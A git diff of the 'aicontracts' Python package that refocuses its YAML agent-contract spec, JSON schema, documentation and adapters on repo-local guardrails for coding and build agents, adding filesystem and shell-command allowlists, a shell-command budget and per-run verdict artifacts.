notification-agent observability: traces: enabled: true sample_rate: 1.0 - - metrics: - - name: triage_latency_ms - type: histogram - description: End-to-end triage latency. - - name: triage_total - type: counter - description: Total tickets triaged. - - name: priority_distribution - type: gauge - description: Current distribution of ticket priorities. - violation_events: emit: true destination: otel - -versioning: - build_id: "sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" - breaking_changes: [] - substitution: - compatible_with: - - "2.0.0" - -slo: - contract_satisfaction_rate: - target: 0.995 - window: "24h" - - latency: - p50_ms: 800 - p99_ms: 5000 - - cost: - avg_usd: 0.04 - p99_usd: 0.10 - - error_budget_policy: freeze_deployments + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/pyproject.toml b/pyproject.toml index d54a0ed..57ed7c2 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -5,7 +5,7 @@ build-backend = "hatchling.build" [project] name = "aicontracts" dynamic = ["version"] -description = "YAML spec + validation SDK for production agent reliability — cost control, tool-use security, and audit trails." +description = "Repo-local, fail-closed guardrails for autonomous coding/build agents." readme = "README.md" license = "Apache-2.0" requires-python = ">=3.9" @@ -25,9 +25,8 @@ classifiers = [ "Typing :: Typed", ] keywords = [ - "agent", "contracts", "llm", "safety", "validation", "mcp", - "ai-agents", "guardrails", "governance", "compliance", "observability", - "opentelemetry", "budget", "cost-control", "tool-use", "audit", + "agent", "contracts", "coding-agent", "build-agent", "guardrails", "repo-local", + "fail-closed", "budgets", "tool-use", "filesystem", "shell", "ci", ] dependencies = [ "pyyaml>=6.0", @@ -37,16 +36,12 @@ dependencies = [ [project.optional-dependencies] otel = ["opentelemetry-api>=1.20"] -langchain = ["langchain-core>=0.2"] -crewai = ["crewai>=0.50"] -pydantic-ai = ["pydantic-ai>=0.1"] -openai = ["openai-agents==0.8.4"] -claude = ["claude-agent-sdk==0.1.50; python_version>='3.10'"] +langchain = ["langchain-core==1.2.26; python_version>='3.10'"] +openai = ["openai-agents==0.13.5; python_version>='3.10'"] +claude = ["claude-agent-sdk==0.1.56; python_version>='3.10'"] all = [ "aicontracts[otel]", "aicontracts[langchain]", - "aicontracts[crewai]", - "aicontracts[pydantic-ai]", "aicontracts[openai]", "aicontracts[claude]", ] @@ -96,3 +91,30 @@ python_version = "3.9" strict = true warn_return_any = true warn_unused_configs = true + +[[tool.mypy.overrides]] +module = [ + "yaml", + "jsonschema", + "jsonschema.*", + "opentelemetry", + "opentelemetry.*", +] +ignore_missing_imports = true + +# Framework SDKs may use newer-Python syntax (e.g. match statements) than +# the project's mypy target. Skip following imports into them so the +# adapter modules type-check against forward references only. +[[tool.mypy.overrides]] +module = [ + "agents", + "agents.*", + "langchain_core", + "langchain_core.*", + "claude_agent_sdk", + "claude_agent_sdk.*", + "mcp", + "mcp.*", +] +ignore_missing_imports = true +follow_imports = "skip" diff --git a/schemas/agent-contract.schema.json b/schemas/agent-contract.schema.json index ef8667e..6ee5748 100644 --- a/schemas/agent-contract.schema.json +++ b/schemas/agent-contract.schema.json @@ -4,7 +4,11 @@ "title": "Agent Contract", "description": "YAML specification for enforceable agent behavioral contracts. Supports three graduated tiers: Standalone (Tier 0), Enforceable (Tier 1), and Composable (Tier 2).", "type": "object", - "required": ["agent_contract", "identity", "contract"], + "required": [ + "agent_contract", + "identity", + "contract" + ], "additionalProperties": true, "patternProperties": { "^x-": { @@ -54,7 +58,10 @@ "$defs": { "Identity": { "type": "object", - "required": ["name", "version"], + "required": [ + "name", + "version" + ], "additionalProperties": true, "properties": { "name": { @@ -73,27 +80,36 @@ }, "authors": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "List of agent authors or maintainers." } } }, "Contract": { "type": "object", - "required": ["postconditions"], + "required": [ + "postconditions" + ], "additionalProperties": true, "properties": { "postconditions": { "type": "array", "minItems": 1, - "items": { "$ref": "#/$defs/Postcondition" }, + "items": { + "$ref": "#/$defs/Postcondition" + }, "description": "At least one machine-checkable output guarantee. This is what makes it a contract, not a README." } } }, "Postcondition": { "type": "object", - "required": ["name", "check"], + "required": [ + "name", + "check" + ], "additionalProperties": true, "properties": { "name": { @@ -108,13 +124,21 @@ }, "enforcement": { "type": "string", - "enum": ["sync_block", "sync_warn", "async_monitor"], + "enum": [ + "sync_block", + "sync_warn", + "async_monitor" + ], "default": "sync_warn", "description": "When and how this check runs. sync_block: fails the invocation. sync_warn: logs warning. async_monitor: evaluates asynchronously." }, "severity": { "type": "string", - "enum": ["critical", "major", "minor"], + "enum": [ + "critical", + "major", + "minor" + ], "default": "major", "description": "Impact level when this postcondition fails." }, @@ -155,11 +179,20 @@ "type": "array", "items": { "type": "object", - "required": ["name", "check"], + "required": [ + "name", + "check" + ], "properties": { - "name": { "type": "string" }, - "check": { "type": "string" }, - "description": { "type": "string" } + "name": { + "type": "string" + }, + "check": { + "type": "string" + }, + "description": { + "type": "string" + } } }, "description": "Preconditions that must hold before the agent runs." @@ -190,44 +223,62 @@ }, "EffectsAuthorized": { "type": "object", - "description": "Capability scope — what the agent MAY do. Default: deny all. Composes via intersection during delegation.", + "description": "Capability scope \u2014 what the agent MAY do. Default: deny all. Composes via intersection during delegation.", "additionalProperties": true, "properties": { "tools": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowlist of tool names or glob patterns (e.g., 'database.*'). Tools not listed are BLOCKED." }, "network": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowed network egress URL patterns (e.g., 'https://api.example.com/*')." }, "state_writes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowed state write scope patterns (e.g., 'tickets.*', 'user.preferences')." + }, + "filesystem": { + "$ref": "#/$defs/FilesystemAuthorization" + }, + "shell": { + "$ref": "#/$defs/ShellAuthorization" } } }, "EffectsDeclared": { "type": "object", - "description": "Effect footprint — what side effects actually occur. Composes via union for auditing. Runtime enforces declared ⊆ authorized.", + "description": "Effect footprint \u2014 what side effects actually occur. Composes via union for auditing. Runtime enforces declared \u2286 authorized.", "additionalProperties": true, "properties": { "tools": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Tools that this agent actually invokes." }, "network": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Network endpoints this agent actually contacts." }, "state_writes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "State scopes this agent actually modifies." } } @@ -260,6 +311,11 @@ "type": "number", "exclusiveMinimum": 0, "description": "Maximum wall-clock time in seconds per invocation." + }, + "max_shell_commands": { + "type": "integer", + "exclusiveMinimum": 0, + "description": "Maximum number of shell commands per invocation." } } } @@ -274,7 +330,9 @@ "type": "array", "items": { "type": "object", - "required": ["name"], + "required": [ + "name" + ], "additionalProperties": true, "properties": { "name": { @@ -346,7 +404,9 @@ }, "allowed_agents": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowlist of agent names that can be delegated to." } } @@ -359,32 +419,64 @@ "traces": { "type": "object", "properties": { - "enabled": { "type": "boolean", "default": true }, - "sample_rate": { "type": "number", "minimum": 0, "maximum": 1 } + "enabled": { + "type": "boolean", + "default": true + }, + "sample_rate": { + "type": "number", + "minimum": 0, + "maximum": 1 + } } }, "metrics": { "type": "array", "items": { "type": "object", - "required": ["name", "type"], + "required": [ + "name", + "type" + ], "properties": { - "name": { "type": "string" }, - "type": { "type": "string", "enum": ["counter", "histogram", "gauge"] }, - "description": { "type": "string" } + "name": { + "type": "string" + }, + "type": { + "type": "string", + "enum": [ + "counter", + "histogram", + "gauge" + ] + }, + "description": { + "type": "string" + } } } }, "violation_events": { "type": "object", "properties": { - "emit": { "type": "boolean", "default": true }, + "emit": { + "type": "boolean", + "default": true + }, "destination": { "type": "string", - "enum": ["stdout", "otel", "callback"], + "enum": [ + "stdout", + "otel", + "callback" + ], "default": "stdout" } } + }, + "run_artifact_path": { + "type": "string", + "description": "Repo-local verdict artifact path template. Supports {run_id}." } } }, @@ -399,7 +491,9 @@ }, "breaking_changes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "List of breaking changes from the previous version." }, "substitution": { @@ -407,7 +501,9 @@ "properties": { "compatible_with": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Versions this agent can substitute for (Liskov-style)." } } @@ -422,22 +518,36 @@ "contract_satisfaction_rate": { "type": "object", "properties": { - "target": { "type": "number", "minimum": 0, "maximum": 1 }, - "window": { "type": "string" } + "target": { + "type": "number", + "minimum": 0, + "maximum": 1 + }, + "window": { + "type": "string" + } } }, "latency": { "type": "object", "properties": { - "p50_ms": { "type": "number" }, - "p99_ms": { "type": "number" } + "p50_ms": { + "type": "number" + }, + "p99_ms": { + "type": "number" + } } }, "cost": { "type": "object", "properties": { - "avg_usd": { "type": "number" }, - "p99_usd": { "type": "number" } + "avg_usd": { + "type": "number" + }, + "p99_usd": { + "type": "number" + } } }, "error_budget_policy": { @@ -445,6 +555,39 @@ "description": "Action when error budget is exhausted (e.g., 'freeze_deployments', 'alert_only')." } } + }, + "FilesystemAuthorization": { + "type": "object", + "additionalProperties": true, + "properties": { + "read": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Repo-local read allowlist globs for coding/build agents." + }, + "write": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Repo-local write allowlist globs for coding/build agents." + } + } + }, + "ShellAuthorization": { + "type": "object", + "additionalProperties": true, + "properties": { + "commands": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Allowed shell command patterns (glob-style matching on normalized command strings)." + } + } } } } diff --git a/spec/SPECIFICATION.md b/spec/SPECIFICATION.md index a4cd901..87a3b23 100644 --- a/spec/SPECIFICATION.md +++ b/spec/SPECIFICATION.md @@ -2,258 +2,199 @@ ## Overview -An Agent Contract is a YAML document that declares what an agent **must do**, -**must not do**, and **what happens when it fails**. Contracts are enforced -at the runtime boundary by the SDK — never via prompts. +An Agent Contract is a repo-local YAML document that declares what an autonomous coding/build agent may do, what it must prove before a run is considered successful, and where the final verdict artifact should be written. -Contracts follow the **OpenAPI model**: a machine-readable document that -generates tooling leverage. Write a YAML file. Get cost control, tool-use -security, and audit trails. +The v0.1.0 surface is intentionally narrow: -## File Format +- authorize reads, writes, commands, tools, network, and state writes +- enforce resource budgets +- evaluate postconditions against outputs and recorded checks +- emit one durable verdict artifact for each run -Contracts are YAML files, typically named `AGENT_CONTRACT.yaml`. The SDK -also accepts any `.yaml` or `.yml` file. A JSON Schema is provided at -`schemas/agent-contract.schema.json` for editor support and machine validation. +## Core principles -### Forward Compatibility +1. **Repo-local first** — the contract belongs in the repository. +2. **Fail closed when configured** — coding/build scopes default to deny when present. +3. **One operator-readable verdict** — every meaningful run can end with one artifact. +4. **Host-agnostic core** — the contract is portable across local runtimes and CI. -- Unknown fields are **ignored** (must-ignore semantics) -- Extension fields use the `x-` prefix (e.g., `x-hipaa-compliance: true`) -- Spec version (`agent_contract` field) follows semver +## File format ---- +Contracts are YAML files, typically named `AGENT_CONTRACT.yaml`. +Unknown fields are ignored for forward compatibility. Extension fields use the `x-` prefix. -## Three Tiers - -Contracts use graduated tiers. Start simple, add guarantees as production demands. - -### Tier 0: Standalone (4 fields) - -**Purpose:** Self-documentation + local validation. Value without any runtime. - -| Field | Type | Required | Description | -|-------|------|----------|-------------| -| `agent_contract` | semver string | Yes | Spec version (e.g., `"0.1.0"`) | -| `identity.name` | string | Yes | Unique agent identifier | -| `identity.version` | semver string | Yes | Agent implementation version | -| `contract.postconditions[]` | array (min 1) | Yes | Machine-checkable output guarantees | - -A Tier 0 contract is useful on its own: it documents what the agent guarantees -and can be validated locally with `aicontracts validate`. - -### Tier 1: Enforceable (adds runtime value) - -Everything in Tier 0, plus: - -| Field | What It Solves | -|-------|---------------| -| `inputs.schema` | Reject malformed inputs before execution (JSON Schema) | -| `outputs.schema` | Validate structured output, catch schema drift (JSON Schema) | -| `effects.authorized` | Default-deny tool allowlist + network + state writes | -| `resources.budgets` | `max_cost_usd`, `max_tokens`, `max_tool_calls`, `max_duration_seconds` | - -The SDK enforces Tier 1 fields at the boundary: input validation, tool gating, -budget circuit breakers, and output validation. - -### Tier 2: Composable (adds multi-agent + compliance value) - -Everything in Tier 1, plus: +```yaml +agent_contract: "0.1.0" +identity: + name: repo-build-agent + version: "0.1.0" +contract: + postconditions: + - name: produces_output + check: "output is not None" +``` -| Field | What It Solves | -|-------|---------------| -| `failure_model` | Typed errors with retry/fallback semantics | -| `effects.declared` | Effect footprint for audit trails (composes via union) | -| `delegation` | Max depth, attenuation rules, sub-agent requirements | -| `observability` | Required OTel spans/events + violation event schema | -| `versioning` | Content-addressed build ID + breaking change rules | -| `slo` | Target rates for contract satisfaction, latency, cost | +## Tiers ---- +### Tier 0 — Standalone -## Field Reference +Required fields: -### `agent_contract` (required) +- `agent_contract` +- `identity.name` +- `identity.version` +- `contract.postconditions[]` -```yaml -agent_contract: "0.1.0" -``` +### Tier 1 — Enforceable -Spec version. Enables forward compatibility. +Adds runtime enforcement value: -### `identity` (required) +- `inputs.schema` +- `outputs.schema` +- `effects.authorized` +- `resources.budgets` -```yaml -identity: - name: support-triage-agent - version: "2.1.0" - description: Triages support tickets by priority. - authors: - - Piyush Vyas -``` +Tier 1 is where coding/build guardrails live. -### `contract.postconditions` (required, min 1) +### Tier 2 — Composable -```yaml -contract: - postconditions: - - name: valid_priority - check: 'output.priority in ["critical", "high", "medium", "low"]' - enforcement: sync_block # sync_block | sync_warn | async_monitor - severity: critical # critical | major | minor - description: Priority must be valid. - slo: - target_rate: 0.995 - window: "24h" -``` +Adds broader composition and observability features: -**Enforcement timing:** -- `sync_block`: Fails the invocation if the check fails -- `sync_warn`: Logs a warning, emits a violation event, but allows the result -- `async_monitor`: Deferred evaluation (e.g., LLM-as-judge quality checks) +- `failure_model` +- `effects.declared` +- `delegation` +- `observability` +- `versioning` +- `slo` -**Check syntax:** CEL-like expressions evaluated safely (no `eval()`): -- `output is not None` -- `output.status == "resolved"` -- `output.status in ["resolved", "escalated"]` -- `len(output.items) > 0` -- `output.score >= 0.8` -- `eval:judge` (LLM-as-judge, async only in v0.1) +## Authorized effects -### `effects` (Tier 1+) +`effects.authorized` declares what the agent may do. ```yaml effects: - authorized: # Capability scope — what the agent MAY do + authorized: tools: - search - - database.* # Glob patterns supported network: - "https://api.example.com/*" state_writes: - "tickets.*" - - declared: # Effect footprint — what actually happens (Tier 2) - tools: - - search - network: - - "https://api.example.com/search" - state_writes: - - "tickets.priority" + filesystem: + read: ["src/**", "tests/**", "README.md"] + write: ["src/**", "tests/**"] + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" ``` -**Key rules:** -- `effects.authorized` is **default-deny**: tools not listed are blocked -- During delegation, authorized effects compose via **intersection** (capabilities attenuate) -- Declared effects compose via **union** (footprint accumulates) -- Runtime enforces: `declared ⊆ authorized` +Rules: + +- tools, network, and state writes are default-deny when configured +- filesystem read/write scopes are default-deny when configured +- shell commands are matched against normalized command strings with glob patterns +- during delegation, authorized effects attenuate by intersection -### `resources.budgets` (Tier 1+) +## Budgets ```yaml resources: budgets: - max_cost_usd: 0.50 - max_tokens: 15000 + max_cost_usd: 1.00 + max_tokens: 50000 max_tool_calls: 20 - max_duration_seconds: 30.0 + max_shell_commands: 10 + max_duration_seconds: 1800 ``` -Per-invocation limits. The SDK trips a circuit breaker when any threshold is exceeded. +`max_shell_commands` is specific to coding/build workflows and complements tool-call budgets. -### `failure_model` (Tier 2) +## Postconditions and recorded checks + +Postconditions are safe expression checks evaluated against `output` plus any extra context provided by the runtime. ```yaml -failure_model: - errors: - - name: timeout - retryable: true - max_retries: 3 - - name: rate_limit - retryable: true - max_retries: 2 - fallback: queue-agent - default_timeout_seconds: 30.0 - circuit_breaker: - failure_threshold: 5 - reset_timeout_seconds: 60.0 +contract: + postconditions: + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical ``` -### `delegation` (Tier 2) +Supported expression forms include: -```yaml -delegation: - max_depth: 2 - attenuate_effects: true # Intersect authorized effects during delegation - require_contract: true # Sub-agents must have their own contract - allowed_agents: - - cache-agent - - summarizer -``` +- `output is not None` +- `output.status == "ok"` +- `output.status in ["ok", "warn"]` +- `len(output.items) > 0` +- `checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0` -### `observability` (Tier 2) +## Observability and verdict artifacts ```yaml observability: - traces: - enabled: true - sample_rate: 1.0 - metrics: - - name: latency_ms - type: histogram - violation_events: - emit: true - destination: otel # stdout | otel | callback + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" ``` -### `versioning` (Tier 2) +The path may contain `{run_id}`. +If omitted, runtimes may default to `.agent-contracts/runs/{run_id}/verdict.json`. -```yaml -versioning: - build_id: "sha256:abc123..." - breaking_changes: [] - substitution: - compatible_with: - - "1.0.0" -``` +Verdict artifacts include: -### `slo` (Tier 2) +- contract identity + spec version +- host identity +- `outcome`: `pass | warn | blocked | fail` +- `final_gate`: `allowed | blocked | failed` +- violations +- executed checks +- budget snapshot +- artifact metadata -```yaml -slo: - contract_satisfaction_rate: - target: 0.995 - window: "24h" - latency: - p50_ms: 500 - p99_ms: 5000 - cost: - avg_usd: 0.10 - p99_usd: 0.50 - error_budget_policy: freeze_deployments -``` +## Outcome semantics ---- +- `pass` — required checks and blocking clauses passed +- `warn` — non-blocking warnings were recorded +- `blocked` — an effect or budget violation denied the run in-flight +- `fail` — the run completed, but required checks or critical postconditions failed -## Breaking Change Rules +## Example coding-agent contract -For the v0.x series: -- Adding optional fields is **not** a breaking change -- Removing or renaming fields **is** a breaking change -- Changing field semantics **is** a breaking change -- Adding new required fields **is** a breaking change +```yaml +agent_contract: "0.1.0" +identity: + name: repo-build-agent + version: "0.1.0" +contract: + postconditions: + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical +effects: + authorized: + filesystem: + read: ["src/**", "tests/**", "README.md"] + write: ["src/**", "tests/**"] + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" +resources: + budgets: + max_shell_commands: 10 +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" +``` -From v1.0 onward: no breaking changes within a major version. +## Compatibility notes ---- +Within v0.1.0: -## Positioning +- adding optional fields is backward-compatible +- removing fields is breaking +- changing field semantics is breaking +- new required fields are breaking -| Layer | What It Does | What Contracts Add | -|-------|-------------|-------------------| -| **MCP** | Tool transport (JSON-RPC) | Policy layer above transport | -| **Agent Skills** | Capability discovery (Markdown) | Machine-enforceable guarantees | -| **A2A** | Agent discovery and routing | Behavioral guarantees on routes | -| **AWS AgentCore** | Cedar policy enforcement | Portable, open spec | -| **LangChain/CrewAI** | Agent orchestration | Declarative, out-of-process enforcement | -| **OpenAPI** | Structural API contracts | Behavioral contracts for non-deterministic agents | +This repo intentionally does **not** use v0.1.0 to broaden into hosted policy platforms or generic agent governance. diff --git a/src/agent_contracts/__init__.py b/src/agent_contracts/__init__.py index 7a9bd09..0f0f427 100644 --- a/src/agent_contracts/__init__.py +++ b/src/agent_contracts/__init__.py @@ -1,4 +1,4 @@ -"""Agent Contracts — YAML spec + validation SDK for production agent reliability. +"""Agent Contracts — repo-local contracts for coding/build agents. Quick start: from agent_contracts import load_contract, ContractEnforcer @@ -6,15 +6,23 @@ contract = load_contract("AGENT_CONTRACT.yaml") with ContractEnforcer(contract) as enforcer: enforcer.check_tool_call("search") - enforcer.add_cost(0.05) + enforcer.check_file_write("src/app.py") + enforcer.check_shell_command("python -m pytest tests/") enforcer.evaluate_postconditions(result) + enforcer.finalize_run(output=result) """ from agent_contracts._version import __version__ from agent_contracts.budgets import BudgetExceededError, BudgetTracker from agent_contracts.composition import CompatibilityReport, check_compatibility from agent_contracts.effects import EffectDeniedError, EffectGuard -from agent_contracts.enforcer import ContractEnforcer, ContractViolation, enforce_contract +from agent_contracts.enforcer import ( + ContractEnforcer, + ContractViolation, + RunCheckResult, + RunVerdict, + enforce_contract, +) from agent_contracts.loader import ContractLoadError, load_contract, validate_contract from agent_contracts.postconditions import PostconditionError, PreconditionError from agent_contracts.tier import TierRecommendation, assess_tier, recommend_upgrades @@ -25,10 +33,12 @@ EffectsAuthorized, EffectsDeclared, FailureModel, + FilesystemAuthorization, ObservabilityConfig, PostconditionDef, PreconditionDef, ResourceBudgets, + ShellAuthorization, SLOConfig, VersioningConfig, ) @@ -36,44 +46,39 @@ __all__ = [ "__version__", - # Core types "Contract", "ContractIdentity", "PostconditionDef", "PreconditionDef", "EffectsAuthorized", "EffectsDeclared", + "FilesystemAuthorization", + "ShellAuthorization", "ResourceBudgets", "DelegationRules", "FailureModel", "ObservabilityConfig", "VersioningConfig", "SLOConfig", - # Loading "load_contract", "validate_contract", "ContractLoadError", - # Tier "assess_tier", "recommend_upgrades", "TierRecommendation", - # Enforcement "ContractEnforcer", "ContractViolation", + "RunCheckResult", + "RunVerdict", "enforce_contract", - # Effects "EffectGuard", "EffectDeniedError", - # Budgets "BudgetTracker", "BudgetExceededError", - # Postconditions "PostconditionError", "PreconditionError", - # Violations "ViolationEvent", "ViolationEmitter", - # Composition "check_compatibility", "CompatibilityReport", ] diff --git a/src/agent_contracts/_version.py b/src/agent_contracts/_version.py index 3cd27c7..ce692bc 100644 --- a/src/agent_contracts/_version.py +++ b/src/agent_contracts/_version.py @@ -1,3 +1,3 @@ """Agent Contracts version.""" -__version__ = "0.1.1" +__version__ = "0.2.0" diff --git a/src/agent_contracts/adapters/__init__.py b/src/agent_contracts/adapters/__init__.py index cd5e596..c930a39 100644 --- a/src/agent_contracts/adapters/__init__.py +++ b/src/agent_contracts/adapters/__init__.py @@ -1,12 +1,11 @@ """Framework adapters for Agent Contracts. -Each adapter is a thin wrapper (<200 LOC) that maps framework-specific -hooks to the SDK's enforcement API. Install the corresponding extra -to use an adapter: +The contract, CLI, verdict artifact, and GitHub Action are framework- +agnostic by design — these adapters are optional ergonomic helpers that +forward in-runtime hook calls into the same enforcer. The CI verdict +gate is the source of truth. - pip install aicontracts[langchain] - pip install aicontracts[crewai] - pip install aicontracts[pydantic-ai] - pip install aicontracts[openai] pip install aicontracts[claude] # Python 3.10+ + pip install aicontracts[openai] + pip install aicontracts[langchain] """ diff --git a/src/agent_contracts/adapters/claude_agent.py b/src/agent_contracts/adapters/claude_agent.py index 688b419..e6b6e0a 100644 --- a/src/agent_contracts/adapters/claude_agent.py +++ b/src/agent_contracts/adapters/claude_agent.py @@ -1,4 +1,4 @@ -"""Claude Agent SDK adapter — contract enforcement via hooks. +"""Claude Agent SDK adapter — repo-local contract enforcement via hooks. Usage (3 lines): from agent_contracts.adapters.claude_agent import ContractHooks diff --git a/src/agent_contracts/adapters/crewai.py b/src/agent_contracts/adapters/crewai.py deleted file mode 100644 index 79b178a..0000000 --- a/src/agent_contracts/adapters/crewai.py +++ /dev/null @@ -1,105 +0,0 @@ -"""CrewAI adapter — contract enforcement for CrewAI agents and crews. - -Usage (3 lines): - from agent_contracts.adapters.crewai import ContractGuard - guard = ContractGuard.from_file("contract.yaml") - result = guard.execute(crew, inputs={"query": "..."}) -""" - -from __future__ import annotations - -from pathlib import Path -from typing import Any, Callable, Dict, List, Optional, Union - -from agent_contracts.enforcer import ContractEnforcer, ContractViolation -from agent_contracts.loader import load_contract -from agent_contracts.types import Contract -from agent_contracts.violations import ViolationEvent - - -class ContractGuard: - """Wraps a CrewAI crew or agent with contract enforcement. - - Provides pre-execution input validation, tool call interception, - and post-execution output validation with postconditions. - """ - - def __init__( - self, - contract: Contract, - *, - violation_destination: str = "stdout", - violation_callback: Optional[Callable[[ViolationEvent], None]] = None, - ) -> None: - self._contract = contract - self._enforcer = ContractEnforcer( - contract, - violation_destination=violation_destination, - violation_callback=violation_callback, - ) - - @classmethod - def from_file( - cls, - path: Union[str, Path], - *, - violation_destination: str = "stdout", - violation_callback: Optional[Callable[[ViolationEvent], None]] = None, - ) -> "ContractGuard": - """Create a guard from a contract YAML file.""" - contract = load_contract(path) - return cls(contract, violation_destination=violation_destination, - violation_callback=violation_callback) - - @property - def enforcer(self) -> ContractEnforcer: - return self._enforcer - - @property - def violations(self) -> List[ViolationEvent]: - return self._enforcer.violations - - def validate_inputs(self, inputs: Dict[str, Any]) -> List[str]: - """Validate inputs before crew execution.""" - return self._enforcer.validate_input(inputs) - - def check_tool(self, tool_name: str) -> None: - """Check if a tool is authorized by the contract.""" - self._enforcer.check_tool_call(tool_name) - - def validate_output(self, output: Any) -> List[str]: - """Validate output after crew execution.""" - errors = self._enforcer.validate_output(output) - self._enforcer.evaluate_postconditions(output) - return errors - - def execute(self, crew: Any, *, inputs: Optional[Dict[str, Any]] = None) -> Any: - """Execute a crew with contract enforcement. - - Validates inputs before execution and outputs/postconditions after. - """ - if inputs is not None: - input_errors = self.validate_inputs(inputs) - if input_errors: - raise ContractViolation(f"Input validation failed: {input_errors}") - - # Execute the crew - result = crew.kickoff(inputs=inputs) - - # Post-execution validation - output = result if not hasattr(result, "raw") else result.raw - self._enforcer.validate_output(output if isinstance(output, dict) else {"result": output}) - self._enforcer.evaluate_postconditions(output) - - return result - - def wrap_tool(self, tool_fn: Callable[..., Any], tool_name: str) -> Callable[..., Any]: - """Wrap a tool function with contract enforcement.""" - - def wrapped(*args: Any, **kwargs: Any) -> Any: - self._enforcer.check_tool_call(tool_name) - return tool_fn(*args, **kwargs) - - wrapped.__name__ = tool_fn.__name__ # type: ignore[attr-defined] - wrapped.__doc__ = tool_fn.__doc__ - return wrapped diff --git a/src/agent_contracts/adapters/openai_agents.py b/src/agent_contracts/adapters/openai_agents.py index fad45d0..bba28ff 100644 --- a/src/agent_contracts/adapters/openai_agents.py +++ b/src/agent_contracts/adapters/openai_agents.py @@ -1,4 +1,4 @@ -"""OpenAI Agents SDK adapter — contract enforcement via RunHooks. +"""OpenAI Agents SDK adapter — repo-local contract enforcement via RunHooks. Usage (3 lines): from agent_contracts.adapters.openai_agents import ContractRunHooks @@ -23,7 +23,7 @@ from agent_contracts.violations import ViolationEvent try: - from openai_agents import RunHooks + from agents import RunHooks except ImportError: # Stub so the module can be imported without openai-agents class RunHooks: # type: ignore[no-redef] diff --git a/src/agent_contracts/adapters/pydantic_ai.py b/src/agent_contracts/adapters/pydantic_ai.py deleted file mode 100644 index 442ca72..0000000 --- a/src/agent_contracts/adapters/pydantic_ai.py +++ /dev/null @@ -1,121 +0,0 @@ -"""Pydantic AI adapter — contract enforcement for Pydantic AI agents. - -Usage (3 lines): - from agent_contracts.adapters.pydantic_ai import ContractMiddleware - middleware = ContractMiddleware.from_file("contract.yaml") - result = await middleware.run(agent, "user prompt") -""" - -from __future__ import annotations - -from pathlib import Path -from typing import Any, Callable, List, Optional, Union - -from agent_contracts.enforcer import ContractEnforcer, ContractViolation -from agent_contracts.loader import load_contract -from agent_contracts.types import Contract -from agent_contracts.violations import ViolationEvent - - -class ContractMiddleware: - """Middleware that wraps Pydantic AI agent execution with contract enforcement. - - Intercepts tool calls for effect gating, tracks budgets, - and validates outputs against the contract schema and postconditions. - """ - - def __init__( - self, - contract: Contract, - *, - violation_destination: str = "stdout", - violation_callback: Optional[Callable[[ViolationEvent], None]] = None, - ) -> None: - self._contract = contract - self._enforcer = ContractEnforcer( - contract, - violation_destination=violation_destination, - violation_callback=violation_callback, - ) - - @classmethod - def from_file( - cls, - path: Union[str, Path], - *, - violation_destination: str = "stdout", - violation_callback: Optional[Callable[[ViolationEvent], None]] = None, - ) -> "ContractMiddleware": - """Create middleware from a contract YAML file.""" - contract = load_contract(path) - return cls(contract, violation_destination=violation_destination, - violation_callback=violation_callback) - - @property - def enforcer(self) -> ContractEnforcer: - return self._enforcer - - @property - def violations(self) -> List[ViolationEvent]: - return self._enforcer.violations - - def check_tool(self, tool_name: str) -> None: - """Check if a tool is authorized by the contract.""" - self._enforcer.check_tool_call(tool_name) - - def validate_result(self, result: Any) -> List[str]: - """Validate agent result against contract.""" - output = result - if hasattr(result, "data"): - output = result.data - if hasattr(result, "output"): - output = result.output - - errors = self._enforcer.validate_output( - output if isinstance(output, dict) else {"result": output} - ) - self._enforcer.evaluate_postconditions(output) - return errors - - async def run(self, agent: Any, prompt: str, **kwargs: Any) -> Any: - """Run a Pydantic AI agent with contract enforcement. - - Wraps agent.run() with pre/post validation. - """ - # Validate input - if self._contract.input_schema: - input_data = {"prompt": prompt, **kwargs} - input_errors = self._enforcer.validate_input(input_data) - if input_errors: - raise ContractViolation(f"Input validation failed: {input_errors}") - - # Execute agent - result = await agent.run(prompt, **kwargs) - - # Validate output - self.validate_result(result) - - return result - - def run_sync(self, agent: Any, prompt: str, **kwargs: Any) -> Any: - """Synchronous version of run() for non-async contexts.""" - if self._contract.input_schema: - input_data = {"prompt": prompt, **kwargs} - input_errors = self._enforcer.validate_input(input_data) - if input_errors: - raise ContractViolation(f"Input validation failed: {input_errors}") - - result = agent.run_sync(prompt, **kwargs) - self.validate_result(result) - return result - - def wrap_tool(self, tool_fn: Callable[..., Any], tool_name: str) -> Callable[..., Any]: - """Wrap a tool function with contract enforcement.""" - - def wrapped(*args: Any, **kwargs: Any) -> Any: - self._enforcer.check_tool_call(tool_name) - return tool_fn(*args, **kwargs) - - wrapped.__name__ = tool_fn.__name__ # type: ignore[attr-defined] - wrapped.__doc__ = tool_fn.__doc__ - return wrapped diff --git a/src/agent_contracts/budgets.py b/src/agent_contracts/budgets.py index ae87c51..a63b44c 100644 --- a/src/agent_contracts/budgets.py +++ b/src/agent_contracts/budgets.py @@ -1,6 +1,6 @@ """Budget enforcement — per-invocation resource limits with circuit breaker. -Thread-safe counters for cost, 